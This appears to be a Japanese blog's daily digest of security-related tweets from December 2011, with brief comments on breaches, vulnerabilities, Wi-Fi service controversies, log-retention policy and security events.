JanneFI :Some people are trying to sell #XSS vulnerabilities. Price? Yahoo $200, Skype $100, SteamPowered $150, MSN $100

jschauma :So glad #Yahoo is ranked top RT @JanneFI Some people are trying to sell #XSS vulnerabilities. Price? Yahoo $200, Skype $100, MSN $100 [...]

JanneFI :@jschauma Perhaps Yahoo #XSS is more expensive, because it includes four vulnerabilities. http://bit.ly/rSReOp


どんどん来年の予測が出てきますが、基本的にはこれまで以上に攻撃されるよ!ってことみたいですね。
trendmicro_jp :[セキュリティブログ]2012年の脅威は何か? 12のセキュリティ予測 http://blog.trendmicro.co.jp/archives/4667

mj_enterprise :標的型攻撃はまだ続く? WatchGuardが2012年セキュリティ予測トップ10発表 http://j.mp/thjHsz


議員なんだからセキュリティに詳しい側近とか付ければいいのに脇が甘いんですかね。
kitagawa_takuji :「サイバー攻撃、議員の意識の低さ指摘」 参議院では問題が発覚した後の12月上旬でも最新版のウイルスソフトをダウンロードしたパソコンが全体の半分強にとどまったとして、鶴保委員長は各議員のこの問題への意識の低さを指摘し、対策を講じたいとしていま

kitagawa_takuji :「セキュリティー不十分」 参院サイバー攻撃最終報告 http://t.asahi.com/4xkx「ウイルスチェック対策を完全に取っていれば防げたであろう事象、との意見が調査業者からあった。まず議員の知識や意識を上げる必要がある」


その他に気になったことはこのあたり。
Yomiuri_Online :参院ID・パスワード、1千人分流出か: http://bit.ly/sm6NF7


kitagawa_takuji :スマートフォンの“熱”を悪用、「Bit-Squatting」による情報漏えいの脅威 - TechTargetジャパン 情報セキュリティ


tamiyata :phpMyAdminの脆弱性を狙った攻撃発生、ラックが注意喚起 - ITmedia エンタープライズ http://ow.ly/818pl


8zz :ギズモードジャパン: マルウェア被害にあったAndroidユーザーに、Microsoftが無料でWindows Phoneをプレゼント! http://dlvr.it/10lTfT


ScanNetSecurity :従来の標的型攻撃と異なる特徴を持つ「キメラアタック」を報告(ラック) http://dlvr.it/10lJP6

テーマ : セキュリティ
ジャンル : コンピュータ

12月15日のtwitterセキュリティクラスタ

あっという間に終末です。ぼんやりしてても時間だけが過ぎていきますが、先週ヨドバシで注文したカメラが発送される気配が全くなくってクリスマスに間に合うか心配になってきました。

スクエニに不正アクセスがあって180万人分の個人情報がぶっこ抜かれたようです。お詫びはやはり有料アイテムでごまかすのでしょうかね。
Yomiuri_Online :スクエニに不正アクセス、180万人情報流出か: http://bit.ly/tXUCCO

nikkeionline :スクエニ会員制サイトに不正アクセス 情報流出か http://s.nikkei.com/t1Z0jh

kitagawa_takuji :スクエニ、不正アクセス受けたサービスの登録会員は180万人 - MSN産経ニュース

slashdotjp : #ゲーム #games スクウェア・エニックスの会員制サイトに不正アクセス、個人情報流出のおそれも


第11回ISLS(Information Security Leardership Series)が開催されていました。ustは鍵がかかっていて見られなかったのですが、内容は面白かったようですね。資料がいくつか公開されています。
ShinoIWAMI :林先生のはUSTできないけれど、資料は公開。 ( #ISLS11 live at ustre.am/FK5j)

h12o :#ISLS11 あ、私の資料が弊社Webにていつのまにかダウンロード可能になっておりました。

connect24h :Taosoftware: 「安全なアプリケーションを作成するために」の資料アップしました。 http://owl.li/803Ol


授業料高いから自腹の人は真剣さが違うんでしょうね。
kazy0021 :自前で学費を払っている情報セキュリティ大学院の学生はじっと聞いてくれる。教壇に立つ甲斐が有る。#ISLS11


罪を重くすれば犯罪が防げるということではないと思うのですが。
leijimaigo :不正アクセス行為を重罰化、警察庁長官が表明 : 社会 : YOMIURI ONLINE(読売新聞) @yomiuri_onlineさんから


なぜジーン・シモンズを…
cnn_co_jp :ジーン・シモンズさんのサイト攻撃でハッカー集団メンバー起訴 http://cnn.jp/u36O9w


XSSのチェック以外にほぼ起動することのないIEですが自動アップデートされるようになったみたいです。うれしいことですがWindows Updateみたいに勝手に再起動とかされると余計に嫌われるようになるかもしれません。
hasegawayosuke :IEも最新版に自動アップデートされるようになるのか。

IE :Announcing: Internet Explorer to start Automatic Upgrades across Windows XP, Vista, and Windows 7


その他に気になったことはこのあたり。
ntsuji :今日、19:00から「『デモクラシー・ナウ!』アノニマスの正体~源流は日本のネット文化にアリ?!」に出演させていただきます。分かる人には分かるTシャツを着て出る予定です!w - http://bit.ly/thDCm0


piyokango :“2012 Security Trends | PandaLabs Blog” http://htn.to/wWtxWv


hasegawayosuke :お、プログラムも公開されたんだ。 "情報処理推進機構:IT人材育成:「ACM2011~アフター・キャンプ・ミーティング2011~」開催のご案内"


hasegawayosuke :"「きちんと説明すれば炎上は防げる」、ネットエージェント池添氏"


itmedia :[エンタープライズ]GlobalSignが不正アクセス事件を総括、業界全体の対応を呼び掛ける bit.ly/rSvbyW


masa141421356 :ベリサインのシール検証ページって「アドレスが、常に "https://sealinfo.verisign.com" で始まっていることを確かめてください」って書いてるから "https://sealinfo.verisign.com.example.jp" は正当だよね


MysteryBonita6 :◆お知らせとお詫び◆本日未明「ボニータ休刊決定」というツイートがありました。これは外部からの不正アクセスによる発言であり、そのような事実は一切ございません。関係者、読者の皆様に多大なるご心配おかけしたことをおわび致します。さらに進化するボニータをこれからもよろしくお願い致します。

テーマ : セキュリティ
ジャンル : コンピュータ

12月14日のtwitterセキュリティクラスタ

@ITでのまとめまとめ連載の最新号が公開されています。ここで読んだようなことばかりだと思いますが皆さん10回くらい読んだり感想を書きまくったりしてみてください。
http://www.atmarkit.co.jp/fsecurity/rensai/matome2011/12.html

BlackHat アブダビが開催中のようです。
FSECUREBLOG :BlackHat Abu Dhabi レポート: 鵜飼です。ただいま、BlackHat Abu Dhabiに参加すべくアラブ首長国連邦に来ています。これから始まりまるのですが、その前に写真を何枚か撮ってきましたのでご報告しま... http://bit.ly/tHVYLH

_kana :大居さん@black hat abu dhabi 2011。英語が綺麗でむつかしい内容を丁寧に話してくれてカッコいいです。 http://lockerz.com/s/164757647


スピーカーとして登壇された大居さん、お疲れ様でした。
a4lg :Black Hat Abu Dhabi の発表と Speaker Party を終えて帰ってきました。最高の発表とはいえませんが、ベストを尽くしました。ちかれたー


なぜいまさらTelnet…
jpcert :こんにちは。ここ一週間ほど Port23/TCP へのスキャンが増加しています。増加している理由については現在調査中です。必要に応じ Telnet サービスの稼働状況の確認と、適切なアクセス制御が行われていることをご確認ください。^KS


今年のまとめや来年の予測を見ると年末なんだな、と思わされます。来週末はクリスマスなんですね。
piyokango :McAfee Security Journal - 2011年 -デスクトップを超えるセキュリティ- / “McAfee Security Journal - 2011年 | マカフィーのセキュリティ研究レポート” http://htn.to/6emk6s


risa_ozaki :2012年のサイバーセキュリティ予測 - 世界のセキュリティ・ラボから | ITpro http://nkbp.jp/vKK5V4


その他に気になったことはこのあたり。
shu_tom :The Best RAT From Your Opinion http://bit.ly/vgqEy1 poison ivy が今のところ一番人気


NobMiwa :パスワードが記載された添付ファイルでの標的型メールが確認されているので、パスワードをメールで送る、ということ自体を禁止して、パスワードが記載されたメールは開かない、という教育が必要ですね


piyokango :『スマートフォン&タブレットの業務利用に関するセキュリティガイドライン』【第一版】を発表 ~実務に活用できる対策チェックシートなどの各種資料を無償提供~ / “ニュース&トピックス | JSSEC 日本スマートフォンセキュリティフォー…” http://htn.to/KpGSE5


yohgaki :- http://ow.ly/7ZItYPDF. HTML5についてこれから学びたい方はどうぞ


security_1topi :「スクウェア・エニックス メンバーズ」が不正アクセスを受けサービスを停止しています。一次調査の結果では?、クレジットカード番号の保有はないため、クレジットカード情報流出はないとしています。/ http://r.sm3.jp/3qkO#1tp


OwaspTokyo :Timing Attacks on CSS Shaders http://bit.ly/vgt76F


jpcert :こんにちは。2011年12月 Microsoft セキュリティ情報 (緊急 3件含) に関する注意喚起を公開しました。^YK


pushebx :[XSS] XSSer v1.6 -beta- aka "Grey Swarm!" released - You can download original code directly from here: #XSS


itmedia :[TechTargetジャパン]過去最大規模、400万台のボットネットを悪用:1400万ドルを荒稼ぎ、FBIが摘発した大規模サイバー犯罪の手口 http://bit.ly/t4iOlc


a_araiguma :@HiromitsuTakagi フィッシング詐欺のDMが出回ってるようです。「twvitter」には気を付けてください。偽のログイン画面は見分けがつかないようです。

テーマ : セキュリティ
ジャンル : コンピュータ

12月13日のtwitterセキュリティクラスタ

IPA の『新しいタイプの攻撃』に関するレポートの評判があまりよろしくないようです。
moton :IPAの新しい攻撃のアレ、いまごろ読んでるが、disりどころ満載すぎw

ucq :@moton ですよねーw

moton :@ucq どれからdisればいいかまず整理しないといけないレベルw

kitagawa_takuji :@moton @ucq 中身を大して読まずにアレを推奨する人が多いのでホント困りますね。

tomoki0sanaki :これは「IPA の『新しいタイプの攻撃』に関するレポート」が「アレ」という通称で通じてしまうようになるのか・・・・:-p RT @moton IPAの新しい攻撃のアレ、いまごろ読んでるが、disりどころ満載すぎw

moton :@kitagawa_takuji いいパーツはあるんですけどね。。。


よくパスワードなしのphpMyAdminはネットで見かけますが、仕事で運営してるところはやっちゃいけませんよね。
matsuu :オランダの認証局Gemnetがパスワード無し状態のphpMyAdminを使ってデータベースを管理してた。ちょっと杜撰すぎる。 / “オランダの認証局、第3者の不正侵入受けた可能性 - DigiNotarに続き | エンタープライズ |…” http://htn.to/M8kgPD


その他気になったことはこのあたり。
itmedia :[エンタープライズ]米捜査機関のWebサイトに不正アクセス、捜査員らの個人情報が暴露 http://bit.ly/rS7zIj


kaito834 :2011年12月、Windows Phone 7.5 端末にて、端末再起動およびメッセージハブ(?)が起動できなくなる問題を Khaled Salameh 氏が発見。SMS メッセージ(どんなものか不明)を送信することで再現するようだ。… http://htn.to/oFPL3S


kaito834 :2011年12月、米カリフォルニアのLucky Supermarkets のセルフレジにおけるスキミング事件が発覚。「Card-skimming scams have been reported at gas stations and … http://htn.to/Sde655


AhnLab_Japan :スーパーのセルフレジにクレジットカード情報傍受機が仕掛けられた http://fb.me/1kFMxyy7g


shu_tom :New Blog post: Adobe ReaderおよびAcrobatのゼロデイ脆弱性(CVE-2011-2462)を悪用する攻撃 (Tokyo SOC Report) http://ibm.co/v2Zjj6


cci_forensics :Malware Domain List の SpyEye まとめ。地味にアップデートされていて、僕のスクリプトもリンクされていたので気づいた。


monjudoh :『iframeの中にform送信すると、クロスドメインのクッキーも書き込める。詳細は不明だが、GoogleAdsenseがこのロジックで書き込んでいる(実際はもっと複雑な行程だが)。』 / “クロスドメインでcookie書き込む方法 …” http://htn.to/c29H4X


nambon :Twitterに似せたデザインで、IDとPASSワードを盗もうとする悪質なサイト。うっかり入力するとDMがバラまかれます。お気をつけて。 http://pic.twitter.com/BCF8e9nw



devilok :Playing around with DOM #XSS (Demo included) http://bit.ly/w2QCmJ


0x3337 :Xss is more than a simple threat - http://slidesha.re/uUkApO
#xss


madonomori :更新: 「Winamp」に複数の致命的な脆弱性、修正を施したv5.623が公開 http://bit.ly/v6dKlt


internet_watch :トレンドマイクロ、PS Vita向けセキュリティサービスを提供 http://bit.ly/trQWlo


matsuu :Androidアプリの話。あとでみる。 / “Taosoftware: 「安全なアプリケーションを作成するために」の資料アップしました。” http://htn.to/TURhKX

テーマ : セキュリティ
ジャンル : コンピュータ

12月12日のtwitterセキュリティクラスタ

最近ISPで普及しつつあるキャリアグレードNATについて。CGNだとグローバルIPアドレスを使い回すからポート番号も記録しないと誰のアドレスかわからないのですね。
HiromitsuTakagi :第8回デジタル・フォレンジック・コミュニティ2011 in TOKYO なう。質問するつもり。

HiromitsuTakagi :質問:ログの保全について、キャリアグレードNAT(CGN)とポート番号記録の件。現状では、ISPでは、DHCPなどでIPアドレスを契約者に払い出す際にそのIPアドレスと契約者符号をログに記録する運用がされていると思うが、昨今、IPv4アドレスの不足に伴い、CGNが普及しつつあり…

HiromitsuTakagi :…あり、同一IPアドレスが複数の契約者で供用することになりつつある。捜査上の照会でIPアドレスから問い合わせを受けても、契約者を1人に絞れない事態が生ずる。この問題への対応として、ISPでNAT変換する際にソースポート番号をログに残す方法がInternet Draftに提案され…

HiromitsuTakagi :…提案されているが、既に検討されているか。従来のIPアドレス払い出し時のログよりは、NAT変換時のログは重い処理となると思われるが、実現できそうか。

HiromitsuTakagi :回答:検討はまだできていないが、課題と認識している。一般に、メディア変換時には課金があれば必然的に記録することになるが、課金にからまない変換だとログに残さない場合がある。通信の秘密の観点からそのようなログを残すことが妥当かの検討が必要と思う。


実はRFCで規定されてたりするのですね。
OrangeMorishita :@HiromitsuTakagi source port numberもとるべしというのが、既にRFC(BCP)になっていますね。RFC 6302(2011年6月発行) http://tools.ietf.org/html/rfc6302

HiromitsuTakagi :おおほんとだ。「In the wake of IPv4 exhaustion and deployment of IP address sharing techniques,…port number…」 RT @OrangeMorishita 既にRFC(BCP)になっていますね

OrangeMorishita :@HiromitsuTakagi このRFCはInformationalではなくBCPということで、ご存知の通り運用ガイドラインとしては最強です。I-Dの-00が2010年の12月なので、最近のIETFとしては提案からRFCになるまで、かなり早かった方だと思います。

HiromitsuTakagi :RFC 6302 はWebサーバ等アクセスされる側のBCPで、 は、ISP側のBCPということですかね。

OrangeMorishita :@HiromitsuTakagi ISP側というか、CGNを提供する側ですね(ISPが多いと思いますが)。tools.ietf.org/html/draft-iet… が最新のようです。で、これもBCPを目指していると。


とはいえ通信の秘密との兼ね合いで面倒そうです。
HiromitsuTakagi :昼間の件。懇親会で耳にした話だと、CGNするISPでNAT時のポート番号をログに残すことは、通信の秘密が(想像以上に)本当に障害になるらしい。総務省で整理すれば解決ってレベルじゃないっぽい。

HiromitsuTakagi :現状の運用で、IPアドレスでの照会に対して契約者を回答できるのは、たまたま本来業務のために記録をとっている(課金のためとか)からあって、用もないのにログをとるのはISPにとってh通信の秘密の侵害であり、捜査機関からの照会に備えて取っておくというのはあり得ないとか。


確かに出るという表現は聞いたことないかもしれません。
kitagawa_takuji :IPAの「『新しいタイプの攻撃』の対策に向けた設計・運用ガイド」の英語版 では出口対策を”Outbound Measures"と訳している。

kitagawa_takuji :受動的なExploitが成功してリバースコネクションが張れてシェルが取れた時、”入れたー”とか"侵入できたー”と叫ぶけど、”出れたー”とは言わないんだな。侵入者にとっては入り口に過ぎないんだよ。


その他に気になったことはこのあたり。
EijiYoshida :FinFireWireで使ってるアンロックの手口はウチの会社の「ノートパソコンを取り巻く脅威とその対策」でデモやってる。

EijiYoshida :ちなみにFinFireWireで使ってるアンロックの手口は今のところXPから7まで全て成功してる。時間が取れたらWindows 8も確認するか。


security_inci :[JVNDB] Microsoft Windows 7 における Internet Explorer サンドボックスの制限を回避される脆弱性 http://bit.ly/s39Q9p


mj_enterprise :オランダの認証局、第3者の不正侵入受けた可能性 - DigiNotarに続き http://j.mp/s2qFxe


kitagawa_takuji :ISMSは時代遅れになる?米国の情報セキュリティ戦略の転換が意味するもの :ソフトバンク ビジネス+IT


ntsuji :ウイルス検知率100%!世界No.1(2011年7-8月)というフレコミの「スーパーセキュリティZERO」( http://bit.ly/usEnTJ )のエンジンが直近の9-10月の結果では100%ではなかった件。 http://bit.ly/upXyjw


hasegawayosuke :「2011年に見つけた脆弱性をまとめてみた」みたいな記事かこうかと思ったけど、今年はほとんど見つけてなかった。

テーマ : セキュリティ
ジャンル : コンピュータ

12月10~11日のtwitterセキュリティクラスタ

私はもう冬休み気分ですが、世間もそろそろ年の瀬です。このサイトも2011年を振り返るかもしれません。
kaito834 :ブログ書いた。2011年の脆弱性情報を振り返る意味でまとめてみました。必要があれば更新するかも。「2011年における気になった脆弱性をまとめてみた」


そろそろ「_nomap」が効いて、位置情報が表示されないようになっているところもあるらしいですが、マルチSSID機能を使っているとまずいかもしれないですね。
dhz :自宅の無線LANのSSIDを_nomap付きにしたのに、子供がDS繋ぐためにAOSSボタンを押したらマルチSSIDに*_nomap-1が増えとる。ダメじゃん。


毎回タイトルに騙されますが今回は「安全なウェブサイト運営入門」というツールだけの紹介です。
itmedia :[エンタープライズ]10個のツールで学ぶ、備える!情報セキュリティの脅威と対策:RPGで体験して学ぶ 安全なWebサイトの運営と管理 http://bit.ly/tsz7kH


毎回すごいことになっていますが、今回もやってくれてますね。ちなみにHJにはぼくも原稿たくさん書いたので読んでみてください。ハニーポットAP作ったりしてます。
hasegawayosuke :Hacker Japan 2012/01月号、修学旅行生の前での愛花とのツーショット写真ひどいなw


その他に気になったことはこのあたり。
mj_enterprise :偽装メールを用いる巧妙な標的型攻撃にいかに対抗すべきか? http://j.mp/uNfDAt


hasegawayosuke :SOP broken on FF? try to research later. http://bit.ly/tzIwge by @0x6D6172696F


suzukimasatomo :12月12-13日は、デジタル・フォレンジック・コミュニティ2011 in Tokyo


typex20 :しろうとさんにも「ただより高いものはない」とネタにされてしまったconnectFreeさん。。 / “公衆無線LANコネクトフリー、利用者の個人情報、抜いた、ばれた、謝った。 | Woishin Journal” http://htn.to/KV8ZXJ


kitagawa_takuji :iPhone/Androidなどスマートフォンの通信・通話をすべて盗聴可能にする「FINSPY MOBILE」 - GIGAZINE


kitagawa_takuji :スマートフォン・Gmail・Skypeなどの盗聴・監視システム販売企業を検索可能なサイト「The Spy files」 - GIGAZINE


_MDL_ :Zscaler : Switch to Google Safe Browsing v2 http://bit.ly/vPbGqV


shu_tom :あと、Exploit の成功率が低い?気がする RT @shu_tom: Adobe Reader のゼロデイ(CVE-2011-2462)は、DEP だけだとバイパスされて攻撃が成功する。JavaScript オフだと攻撃は失敗する。EMET を使うと防御可能。


テーマ : セキュリティ
ジャンル : コンピュータ

12月9日のtwitterセキュリティクラスタ

今日も引き続き、たまらない寒さです。

昨日はBlackHat AbuDhabi 2011 壮行会(セキュそば前夜祭)が開催されました。DTが突然現れたり、英語で再度プレゼンが行われたりと思いもよらないことが起こりましたが、見ている側は楽しかったです。
takesako :無事帰宅してブログ書きました→ BlackHat AbuDhabi 2011 壮行会(セキュそば前夜祭)開催しました #blacksoba


Owaps Tokyo3度目のチャレンジになるらしいです。協力できることがあればぜひにと思いますが基本英語なんですかね…
OwaspTokyo :Owasp Tokyo announced at #blacksoba. Please contact us if you want to help us organize the next chapter meeting.


そして素晴らしい英語のプレゼンを披露された愛甲さん、お疲れ様でした。
07c00 :今年一番あせった。そして涙目になったw


有志によってメンテナンスされるようになったFFFTPですが、脆弱性が見つかったそうです。
security_1topi :「ど」が付くほどの定番の国産FTPクライアントの脆弱性が修正されています。今後もがんばって欲しいですね。 / FFFTP における実行ファイル読み込みに関する脆弱性 - http://r.sm3.jp/3nXP #1tp

flat_ff :FFFTPはソースを公開して成功したと思う。需要さえあれば、こうやって有志が手を入れてくれるのだから。仮に開発にいたらなくても、誰かが目を通すことで脆弱性のチェックになる。そうすると、脆弱性を抱えたまま使われるということは減るだろう。


楽しそうです。昔職場でWinNukeでPCをブルースクリーンにしたり、ブルースクリーンの色を変えたりしてキャッキャキャッキャ楽しんでた頃を思い出しました。
ntsuji :FFFTPの脆弱性でチームのみんなで遊ぶなど。

ntsuji :チーム内でお互いのPCの壁紙を変えたり、動画再生させたりする攻撃をする戦いが行われている模様。


その他に気になったことはこのあたり。
yumano :よく使われるIDとパスワード


MasafumiNegishi :Newest Adobe Flash 11.1.102.55 and Previous 0 Day Exploit, (Thu, Dec 8th) http://bit.ly/rIKToX


ntsuji :Microsoft Windows Ancillary Functionドライバーにおける権限昇格可能な脆弱性(CVE-2011-2005)に関する検証レポート が公開されていますよ。 http://bit.ly/vygwFl


heatwave_p2p :"アップル(ソニー、アマゾン、マイクロソフト)がジェイルブレイクを支持しなければならない理由 - P2Pとかその辺のお話"


ScanNetSecurity :中華紅客聯盟他が南京大虐殺に関連した対日攻撃を扇動(Far East Research) http://dlvr.it/zk8gc


gohsuket :だってPC以前の1960年代建設。改修不可能w RT @F0ro @piyokango 『なお、原子力発電所の制御系システムはサイバー攻撃を受けるような構成になっておりません。』 / “当社関連報道について|TEPCOニュース|東京電力 http://htn.to/D84ztu

テーマ : セキュリティ
ジャンル : コンピュータ

12月8日のtwitterセキュリティクラスタ

雪なのか雨なのかわかりませんがクソ寒いので困ります。

公衆無線LANサービスを始めたのはいいものの、競合他社へのWebサイトへのアクセスをブロックするそうです。どうやら電気通信事業法を知らなかった模様。
kuroxplum :しかし公衆無線LANで楽天とAmazonをブロックとは何考えてんだか>7SPOT。いや、何も考えていないからこうなるのか。ここまで露骨な電気通信事業法違反事件も珍しい。こんなんじゃ、そもそも電気通信事業者の届出をしているかも怪しいなぁ…

SongOfYste :セブンスポットについては最初は???だったけと、翌々考えたら凄まじく悪質だよな…他社の通販サイトを完全ブロックって、社内NWじゃないんだから(´д`)

itoishi :amazon・楽天などの競合他社へのアクセスを遮断している疑惑が出ているセブンスポット。どうやら「セブンスポットのサービスポリシーに反する」旨の表示がされるみたいだけど、サービスポリシーが公開されてない。 #セブンスポット


kuroxplum :公衆無線LANサービスはやっぱり電気通信事業だわね。参入マニュアル追補版 届出様式第4

kuroxplum :セブンスポットが電気通信事業であることは明らかになったので、セブンスポットの利用規約を見る。 http://webapp.7spot.jp/internets/about

kuroxplum :するってえと、規約の冒頭には「株式会社セブン-イレブン・ジャパン、株式会社イトーヨーカ堂、株式会社セブン&アイ・フードシステムズ、株式会社そごう・西武、株式会社セブンネットショッピング(以下、総称して「当社ら」と言います)は、…」とあり、誰が提供主体か不明。

kuroxplum :電気通信事業法 第百八十五条  第十六条第一項の規定に違反して電気通信事業を営んだ者(第九条の登録を受けるべき者を除く。)は、六月以下の懲役又は五十万円以下の罰金に処する。

kuroxplum :改めて7SOPT利用規約 読むと、そもそもブロッキングの話はどこにもない。ふつう、申し訳程度にでも書くものだろうと思うけれど、それもないということは、直前に偉いさんか誰かがねじ込んだとか、そんな臭がする。

kuroxplum :そういうことだとすると、セブンの法令遵守体制がとんでもなく不安であるというか、無理が通れば道理が引っ込む的なものをどう阻止するかということになるんだろうと、弊社で同じことがあったら職務柄阻止すべきある立場である自分に自戒を込めつつ、セブンイレブンで買ったビールを飲むことにする。

kuroxplum :ああ、大事なこと言い忘れてた。ブロッキング、明らかに通信の秘密の侵害(電気通信事業法第4条)だわね。わかりきってることだけど、そっちを先にTweetしないと、枝葉末節みたいなことになってまうな、これ。


Adobe Readerってなんでこんなに脆弱性ばっか見つかるんでしょうね。
AdobeSupportJ :【セキュリティ情報】先ほどお知らせしたAdobe Reader/Acrobat の識別番号APSA11-04に関する日本語抄訳を公開しました。アップデータは来週リリースの予定です。http://adobe.ly/uGr4PE

security_1topi :Adobe Reader/Acrobatのゼロデイ脆弱性を利用した攻撃が確認されていることを受けて、9は遅くとも12月12日週に。Xは保護モード機能で防御可能として2012年1月10日に修正プログラムリリースするようです。 / http://r.sm3.jp/3nlk #1tp

security_1topi :Adobe Acrobat/Reader のセキュリティに関しては http://r.sm3.jp/3nn8 。トラブルシュートは http://r.sm3.jp/3nn9。保護モードの状態を確認するには、ファイル/プロパティ/詳細設定/保護モード で確認可能です。 #1tp

kaito834 :2011年12月に発覚したAdobe Readerの脆弱性CVE-2011-2462を悪用した攻撃に関するブログ記事。攻撃の際のメール文面やexploitの一部が紹介されている。 / “A New Zero Day PDF Explo…” http://htn.to/SKgGsd


私も顔出すつもりですが雪が心配ですね。
hasegawayosuke :明日、突発的にセキュリティの勉強会やることになったみたいです。(僕は参加しませんけど http://atnd.org/events/23175 BlackHat AbuDhabi 2011壮行会(セキュそば前夜祭) : ATND


SixApartの関さんとか顔出ししていたわけですが、金出した側は責任を押しつけて逃げるわけですね。
rocaz :コネクトフリーのサイト http://connectfree.jp、サービス紹介が簡素になって事例が無くなり、役員紹介もクリストファーだけになった。DNPもサービス停止したみたいだし、みんな逃げ足早いねえ、オマエらも十分責任あるんじゃねえの?


ハッカージャパン今日発売なのですね。私も思った以上に書いてます。
kitagawa_takuji :本日発売のハッカージャパンに久しぶりに記事を書きました。 Metasploit関連ツールの Armitage、Metasploit Community Edition、Metasploit vSploit についての紹介記事を4ページです。


その他に気になったことはこのあたり。
ockeghem :P11の「4.2レベル設定について」など抱腹絶倒もの。モデル契約書は全体としてはレベル高いのになぜ? / “モデル取引・契約書<追補版>-セキュリティチェックシート解説(PDF)” http://htn.to/9Sx5Xd


tdaitoku :Microsoft、14件の月例セキュリティ情報の公開を予告


ikepyon :セキュアな開発の動画らしい。見てみる

ikepyon :つうかhttp://education.isc2.org/csslp-webcast-[1?9]/まであるみたいだな


PacSecjp :thank you for waiting. #PacSec 2011 slides are now available. お待たせしました、PacSec2011の発表スライドがアップされました


gohsuket :キター!米政府の「Trustworthy Cyberspace: 連邦サイバーセキュリティ研究開発戦略計画」RT @CipherLaw Federal Cybersecurity R&D Strategic Plan Released. http://goo.gl/gdGzU


roaring_dog :DNPとBBSec、「Web脆弱性診断サービス」の期間限定パッケージ - クラウド Watch -


ockeghem :Webシステムで「重要資産の洗い出し」が違和感があると思ったら、洗い出ししてもSQLインジェクションとかXSSとかの脆弱性がどっか1箇所にあったらどかんと持って行かれるからですね。二要素認証とか暗号化の検討をする際には意味はありますが、そういうのをしない場合あまり意味がない

ockeghem :つまり、パスワード認証だけの一般的なWebシステムだと、「最重要情報資産」だけ把握して、それを基準にして対策すればよいということ。後は、暗号化の対象とするデータを洗い出すくらいで、本格的な「洗い出し」は出番がないですな。防衛分野とかは別なんでしょうが。

テーマ : セキュリティ
ジャンル : コンピュータ

12月7日のtwitterセキュリティクラスタ

どんよりして寒くてやる気が起きませんが今日は仕事もありません('A`)ヴァー

予想通りというか当たり前なのですが、PocketWifiなど持って喫茶店などで待ち構えたりしちゃいけませんね。
t_okada :やっぱり接続しちゃうんだなw:0001Softbankというオレオレ基地局で遊んでみた。 - ブックマクロ開発に (id:takuya_1st / @takuya_1st)


確かにパスワード保存していなければ認証するので残念といえば残念です。
t_okada :公衆無線LANは今のやりかたを全部捨てて一から考え直したほうがいいよ。現状のシステムはとても不便な上にとても危険。

t_okada :公衆無線LANの二大欠陥:(1)ブラウザで認証するからHTML以外の通信が(最初は必ず)失敗する。(2)SSIDだけでは本物のAPかどうかの確認が難しい。


ちょっと行ってみたいですが、今回はどんなお話なのでしょうかね。
hebikuzure :【告知】「第6回ネットワークパケットを読む会(仮)」勉強会と忘年会を12月19日(月)に開催します。勉強会 http://atnd.org/events/22972 のみ 、忘年会 http://atnd.org/events/22973 のみの参加も歓迎です。 #pakeana


ちらほら解いている人をTLで見た気がしますが、googleで答えが見つかるそうなので、ぼくでも解けるような気がします。
ScanNetSecurity :英国諜報機関 GCHQ の就職暗号解答編~専門家言「問題も報酬も期待外れ」(The Register) http://dlvr.it/zTRrF


その他に気になったことはこのあたり。
kaito834 :Adobe Readerの脆弱性CVE-2011-2462を悪用するPDFを解析した結果が紹介されている。「PDF X-RAY」にそのPDFがアップデートされており、それを解析したようだ。 / “Analyzing CVE-2011-…” http://htn.to/Hg68t5


kitagawa_takuji :【セキュリティ ニュース】遺失物USBメモリの6割からマルウェア - 暗号化対策も未実施:Security NEXT http://security-next.com/026438


ScanNetSecurity :師走を狙った偽クラウドセキュリティソリューション 他(ダイジェストニュース) http://dlvr.it/zNQh3


ScanNetSecurity :Webアプリケーションの脆弱性を迅速に発見、補修するソリューション(NEC、日本IBM) http://dlvr.it/zNQh0


ChihiroShiiji :Lifelog、@rocaz氏の問い合わせへのauの応答等を追補。 #aulifelog http://togetter.com/li/204683


nalsh :ただいま成瀬文字化け研究所ではHTML5ななのにcharsetを明示していない非常に残念なページを募集しています


risa_ozaki :標的型攻撃を防ぐには最新のパッチが有効、ゼロデイ攻撃は多くない - インタビュー | ITpro http://nkbp.jp/uttLOG


shu_tom :EMETを利用した標的型メールの防御 (今週のSecurity Check) ITpro http://nkbp.jp/t742h0 書きました。最後のページでEMETの検証結果を載せました。


Xylit0l :First #XSS on a .XXX domain #ph34r http://pic.twitter.com/LQVUb87D

テーマ : セキュリティ
ジャンル : コンピュータ

12月6日のtwitterセキュリティクラスタ

connectFreeがMACアドレスを埋め込んだりAmazonのコードを書き換えたりなどやってたもろもろのことをすべてやめるそうで、ひとまず解決といったところでしょうか。
kristopher :本騒動につきまして、代表取締役兼開発責任者として、深く陳謝いたします。 http://bit.ly/sh6fJs


そして関わっている大日本印刷が情報セキュリティマネジメントシステムの認証であるところのJIS Q27001認証を取得とのこと。へー。
NA_AK :このタイミングでとか神ががってるなw RT @HiromitsuTakagi: 大日本印刷のソリューション企画開発部門が情報セキュリティマネジメントシステムのISO27001/JIS Q27001の認証を取得 http://ow.ly/1BARuM


connectFreeって通信事業者として届出してたのですかね。
ockeghem :フリーメールや広告付き無料電話は、広告により収入を得る事業であるため届出要 / “電気通信事業参入マニュアル[追補版]― 届出等の要否に関する考え方及び事例 ― (PDF)” http://htn.to/5eJMSn


そしてCarrier IQについて引き続き。
kaz_k :「問題はCarrier IQでなく、キャリアとメーカー」著名研究者が解析結果 -INTERNET Watch internet.watch.impress.co.jp/docs/news/2011… via @internet_watch

rocaz :機能改善だからユーザーの了解無く何取得してもいいなんて牧歌的な時代はもう終わっていると自覚すべし。そんなことを信じているのは今やキャリアにしかいない / yebo blog: Carrier IQの本当の話 http://j.mp/w0pVDu

cnet_japan :Carrier IQにキーロガーの機能なし--Linuxハッカーが分析

piyokango :“[社説]スマートフォンのプライバシーを覗き見するのは誰だ (東亜日報)” http://htn.to/6yWWD7


いろいろな脆弱性が見つかったり公開されないまま攻撃に使われていたりするようです。もうすぐ冬休みだというのにタイミングが悪くて管理者の皆さんは頭が痛いことだと思います。
HironobuSUZUKI :とりあえず読んどけ。これマジヤバい: Oracle Java SE JDKおよびJREのRhinoスクリプトエンジンの脆弱性(CVE-2011-3544)に関する検証レポート/NTTデータ先端技術 

kaito834 :2011年12月、Adobe Reader/Acrobatの未修正の脆弱性(CVE-2011-2462)が攻撃に悪用されていることが確認されたようだ。WinのReader/Acrobat 9.x の修正バージョンは12/12の週に提供予… http://htn.to/9H2y2X

j0emccray :DNS cache poisoning attack on Google, Gmail, YouTube, Yahoo, Apple http://ow.ly/1g0ZwT



